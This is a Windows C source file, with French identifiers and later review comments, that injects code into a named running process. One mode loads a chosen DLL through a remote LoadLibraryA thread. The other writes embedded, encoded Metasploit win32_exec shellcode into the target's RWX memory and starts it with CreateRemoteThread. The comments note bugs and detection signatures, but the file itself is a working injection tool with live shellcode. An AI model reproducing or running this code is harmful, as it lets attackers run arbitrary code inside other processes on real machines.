#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#define USAGE "./%s [-dll <processus> <full path dll>|-sh <processus>]"

long NomProcessusToPid(char* process);
int InjectDllDansProcessus(long pidProcAInjecter , char* fullPathDll);
int InjectShellcodeDansProcessus(long pidProcAInjecter);

/*
 * Entry point. Dispatches on argv[1]:
 *   -dll <processus> <full path dll> -> InjectDllDansProcessus(NomProcessusToPid(argv[2]), argv[3])
 *   -sh  <processus>                 -> InjectShellcodeDansProcessus(NomProcessusToPid(argv[0]))
 * Prints USAGE when fewer than two operands are present or the switch is unknown.
 *
 * Always returns 0, even when the injection function reports failure (returns 0),
 * so the process exit status carries no result; only stdout does.
 */
int main(int argc ,char* argv[] )
{
    printf("Inject Dll into fucking process par 0vercl0k.\n\n");

    /* argc is never consulted; the code relies on argv[argc] being NULL
       (guaranteed by the C standard) and on || short-circuiting, so these
       reads stay in bounds for any argc >= 1. */
    if(!argv[1] || !argv[2] ){printf(USAGE,argv[0]); return 0;}

    if(!strcmp("-dll",argv[1]) && argv[3])
    {
        /* Only an exact return of 1 counts as success. */
        if(InjectDllDansProcessus(NomProcessusToPid(argv[2]),argv[3]) == 1)
            printf("[*] Ownage du processus avec succes.\n");
    }
    else if(!strcmp("-sh",argv[1]))
    {
        /* NOTE(review): argv[0] is this program's own invocation name, not the
           <processus> operand that USAGE documents for -sh (argv[2], as the
           -dll branch above uses). As written, the -sh branch looks up the
           injector itself. Looks like a typo -- confirm intent. */
        if(InjectShellcodeDansProcessus(NomProcessusToPid(argv[0])))
            printf("[*] Ownage du processus avec succes.\n");
    }
    else
    {
        printf(USAGE,argv[0]);
    }
    return 0;
}

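/*
 * Return the PID of the first running process whose executable name equals
 * `process` (exact, case-sensitive strcmp, as in the original).
 *
 * Walks a TH32CS_SNAPPROCESS snapshot with Process32First/Process32Next.
 *
 * Returns the matching th32ProcessID, or 0 when `process` is NULL, the
 * snapshot cannot be taken, the enumeration is empty, or nothing matches.
 * 0 is also the PID of the System Idle Process, so callers cannot tell
 * "not found" from that entry.
 *
 * Changes versus the original:
 *   - the snapshot handle is closed on every path (it leaked when
 *     Process32First failed);
 *   - the entry filled in by Process32First is compared too (the original
 *     called Process32Next before the first comparison and so skipped it);
 *   - a NULL `process` no longer reaches strcmp.
 *
 * Assumes a non-UNICODE build: szExeFile is compared as a char string.
 */
long NomProcessusToPid(char* process)
{
    long pid = 0;
    PROCESSENTRY32 entry = {0};
    HANDLE snapshot;

    if (process == NULL)
        return 0;

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;

    /* dwSize must be set before the first Process32First call. */
    entry.dwSize = sizeof entry;

    if (Process32First(snapshot, &entry)) {
        do {
            if (!strcmp(entry.szExeFile, process)) {
                pid = (long)entry.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &entry));
    }

    /* Single exit so the snapshot is never leaked. */
    CloseHandle(snapshot);
    return pid;
}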

/*
 * Load fullPathDll into the process identified by pidProcAInjecter.
 *
 * Call chain (one Win32 call per step, MSDN links inline):
 *   OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE)
 *   -> WriteProcessMemory(path string) -> CreateRemoteThread(LoadLibraryA, path)
 *   -> WaitForSingleObject -> VirtualFreeEx.
 * This is the classic remote-thread DLL injection sequence; from a detection
 * standpoint it is exactly what host-based monitoring looks for (a cross-process
 * handle opened with full access, a remote executable allocation, and a remote
 * thread whose start address is LoadLibraryA).
 *
 * Returns 1 once the remote thread has exited, 0 if any call before that fails.
 * "1" only means the remote thread ran: LoadLibraryA's return value (the thread
 * exit code) is never read, so a DLL that fails to load is still reported as
 * success by the caller.
 *
 * Resource handling, unchanged here but worth noting:
 *   - handleProcess leaks on every early return after OpenProcess succeeds;
 *     the remote allocation leaks when WriteProcessMemory or CreateRemoteThread fails.
 *   - The module handle from LoadLibrary("kernel32") is never released
 *     (harmless in practice, kernel32 is always resident).
 *   - VirtualFreeEx with MEM_DECOMMIT decommits the pages but leaves the
 *     region reserved in the target; MEM_RELEASE would return it fully.
 *   - The return values of WaitForSingleObject, VirtualFreeEx and CloseHandle
 *     are ignored.
 */
int InjectDllDansProcessus(long pidProcAInjecter , char* fullPathDll)
{
    /* +1 so the terminating NUL is copied and the remote copy is a valid C
       string for LoadLibraryA. strlen returns size_t; it is narrowed to long
       here and widened again when passed as SIZE_T below. */
    long tailleStringDll = strlen(fullPathDll) + 1;

    printf("[+] Ouverture du process.\n");

    /* NULL when the PID does not exist or the caller lacks the rights for
       PROCESS_ALL_ACCESS on that process. */
    HANDLE handleProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE , pidProcAInjecter);// OpenProcess -> http://msdn2.microsoft.com/en-us/library/ms684320.aspx.
    if(handleProcess == NULL)return 0;

    printf("[+] Reservation et écriture dans la mémoire du processus.\n");
    LPVOID addrEspaceReserve = VirtualAllocEx( handleProcess , NULL , tailleStringDll , MEM_COMMIT , PAGE_EXECUTE_READWRITE); // VirtualAllocEx -> http://msdn2.microsoft.com/en-us/library/aa366890.aspx.
    if(addrEspaceReserve == NULL)
        return 0; /* handleProcess leaks here */

    /* Last argument (lpNumberOfBytesWritten) is 0/NULL: a partial write is
       indistinguishable from a full one; only the BOOL result is checked. */
    int retourFonctionWrite = WriteProcessMemory( handleProcess , addrEspaceReserve , fullPathDll , tailleStringDll , 0); // WriteProcessMemory() -> http://msdn2.microsoft.com/en-us/library/ms681674.aspx.
    if(retourFonctionWrite == 0)
        return 0; /* handleProcess and the remote buffer leak here */

    printf("[+] Creation du thread dans le processus.\n");
    DWORD identificateurThread ;
    /* The address of LoadLibraryA is resolved in THIS process and reused in the
       target; that only works if kernel32 is mapped at the same base in both
       (same bitness). GetProcAddress returning NULL is not checked. */
    LPTHREAD_START_ROUTINE addrLoadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32"),"LoadLibraryA"); // GetProcAddress() -> http://msdn2.microsoft.com/en-us/library/ms683212.aspx. LoadLibrary() -> http://msdn2.microsoft.com/en-us/library/ms684175.aspx.
    /* The remote thread's single argument is the remote copy of the path. */
    HANDLE retourFonctionCreate = CreateRemoteThread( handleProcess , NULL , 0 , addrLoadLibrary , addrEspaceReserve , 0 , &identificateurThread ); // CreateRemoteThread() -> http://msdn2.microsoft.com/en-us/library/ms682437.aspx.
    if(retourFonctionCreate == NULL)
        return 0; /* handleProcess and the remote buffer leak here */

    /* INFINITE: blocks until LoadLibraryA returns in the target; a DllMain that
       never returns hangs this program. */
    WaitForSingleObject(retourFonctionCreate,INFINITE); //WaitForSingleObject() -> http://msdn2.microsoft.com/en-us/library/ms687032.aspx.
    VirtualFreeEx( handleProcess , addrEspaceReserve , 0 , MEM_DECOMMIT); //VirtualFreeEx() -> http://msdn2.microsoft.com/en-us/library/aa366894.aspx

    CloseHandle(handleProcess);
    CloseHandle(retourFonctionCreate);


    return 1;
}

/*
 * Copy the embedded byte string `sh` into the process identified by
 * pidProcAInjecter and start a remote thread at the copy's base address.
 *
 * Same call chain as InjectDllDansProcessus (OpenProcess / VirtualAllocEx /
 * WriteProcessMemory / CreateRemoteThread / WaitForSingleObject / VirtualFreeEx),
 * except the thread entry point is the remote buffer itself rather than
 * LoadLibraryA, and the thread argument is NULL. For monitoring purposes this
 * is the same observable pattern: full-access cross-process handle, remote
 * RWX allocation, remote thread starting in non-image memory.
 *
 * The payload bytes are reproduced verbatim from the generator named in the
 * comment below; nothing in this file describes them beyond that header line.
 *
 * Returns 1 once the remote thread has exited, 0 if any call before that fails.
 * Same leak pattern as the DLL variant: handleProcess (and the remote buffer)
 * are not released on the early returns, and the results of
 * WaitForSingleObject, VirtualFreeEx and CloseHandle are ignored.
 */
int InjectShellcodeDansProcessus(long pidProcAInjecter)
{
   /* win32_exec -  EXITFUNC=thread CMD=taskmgr.exe Size=168 Encoder=PexFnstenvSub http://metasploit.com */
    char sh[] =
    "\x29\xc9\x83\xe9\xdc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x40"
    "\x3b\x1f\x1f\x83\xeb\xfc\xe2\xf4\xbc\xd3\x5b\x1f\x40\x3b\x94\x5a"
    "\x7c\xb0\x63\x1a\x38\x3a\xf0\x94\x0f\x23\x94\x40\x60\x3a\xf4\x56"
    "\xcb\x0f\x94\x1e\xae\x0a\xdf\x86\xec\xbf\xdf\x6b\x47\xfa\xd5\x12"
    "\x41\xf9\xf4\xeb\x7b\x6f\x3b\x1b\x35\xde\x94\x40\x64\x3a\xf4\x79"
    "\xcb\x37\x54\x94\x1f\x27\x1e\xf4\xcb\x27\x94\x1e\xab\xb2\x43\x3b"
    "\x44\xf8\x2e\xdf\x24\xb0\x5f\x2f\xc5\xfb\x67\x13\xcb\x7b\x13\x94"
    "\x30\x27\xb2\x94\x28\x33\xf4\x16\xcb\xbb\xaf\x1f\x40\x3b\x94\x77"
    "\x7c\x64\x2e\xe9\x20\x6d\x96\xe7\xc3\xfb\x64\x4f\x28\xd4\xd1\xff"
    "\x20\x53\x87\xe1\xca\x35\x48\xe0\xa7\x4f\x7e\x6c\x2b\x56\x78\x6d"
    "\x6e\x5e\x67\x7a\x40\x3b\x1f\x1f";

    /* strlen stops at the first NUL byte. None of the bytes listed above is
       \x00, so this yields the full 168 bytes the header line states
       (10 lines of 16 + one of 8). A payload containing \x00 would be
       truncated here; `sizeof sh - 1` would not depend on that. */
    long tailleStringSh = strlen(sh);
    /* The "(%ld)" after the newline is a leftover length trace. */
    printf("[+] Ouverture du process.\n(%ld)",tailleStringSh);

    /* NULL when the PID does not exist or the caller lacks the rights for
       PROCESS_ALL_ACCESS on that process. */
    HANDLE handleProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE , pidProcAInjecter);// OpenProcess -> http://msdn2.microsoft.com/en-us/library/ms684320.aspx.
    if(handleProcess == NULL)return 0;

    printf("[+] Reservation et écriture dans la mémoire du processus.\n");
    LPVOID addrEspaceReserve = VirtualAllocEx( handleProcess , NULL , tailleStringSh , MEM_COMMIT , PAGE_EXECUTE_READWRITE); // VirtualAllocEx -> http://msdn2.microsoft.com/en-us/library/aa366890.aspx.
    if(addrEspaceReserve == NULL)
        return 0; /* handleProcess leaks here */

    /* lpNumberOfBytesWritten is 0/NULL: only the BOOL result is checked. */
    int retourFonctionWrite = WriteProcessMemory( handleProcess , addrEspaceReserve , sh , tailleStringSh , 0); // WriteProcessMemory() -> http://msdn2.microsoft.com/en-us/library/ms681674.aspx.
    if(retourFonctionWrite == 0)
        return 0; /* handleProcess and the remote buffer leak here */

    printf("[+] Creation du thread dans le processus.\n");
    DWORD identificateurThread ;
    /* Thread start address = base of the remote buffer; parameter = NULL. */
    HANDLE retourFonctionCreate = CreateRemoteThread( handleProcess , NULL , 0 , (LPTHREAD_START_ROUTINE)addrEspaceReserve , NULL , 0 , &identificateurThread ); // CreateRemoteThread() -> http://msdn2.microsoft.com/en-us/library/ms682437.aspx.
    if(retourFonctionCreate == NULL)
        return 0; /* handleProcess and the remote buffer leak here */

    /* INFINITE: blocks until the remote thread exits; a thread that never
       returns hangs this program. */
    WaitForSingleObject(retourFonctionCreate,INFINITE); //WaitForSingleObject() -> http://msdn2.microsoft.com/en-us/library/ms687032.aspx.
    /* MEM_DECOMMIT with size 0 decommits the region but leaves it reserved. */
    VirtualFreeEx( handleProcess , addrEspaceReserve , 0 , MEM_DECOMMIT); //VirtualFreeEx() -> http://msdn2.microsoft.com/en-us/library/aa366894.aspx
    CloseHandle(handleProcess);
    CloseHandle(retourFonctionCreate);
    return 1;
}